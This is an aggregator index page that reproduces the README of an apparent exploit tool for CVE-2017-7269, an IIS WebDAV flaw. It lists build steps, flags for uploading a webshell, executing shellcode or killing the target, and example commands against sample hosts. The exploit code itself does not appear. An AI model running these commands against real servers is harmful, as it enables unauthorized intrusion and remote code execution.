Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/zcgonvh/cve-2017-7269-tool

CVE-2017-7269 to webshell or shellcode loader
https://github.com/zcgonvh/cve-2017-7269-tool

Last synced: 25 days ago
JSON representation

CVE-2017-7269 to webshell or shellcode loader

Awesome Lists containing this project

README

        

# cve-2017-7269 webshell and shellcode tool

### build

csc cve-2017-7269.cs

### usage

CVE-2017-7269 [parms]

Header:
-h set host for [If] header
-p set port for [If] header
-s set scheme for [If] header
-l length of physical path

WebShell:
-w upload webshell to server
-wp path of webshell to save

ShellCode:
-c execute the shellcode

Misc:
-t test vulnerable only.
-e exit process when getshell or test
-k kill target(equals -e and -t)

### example

CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin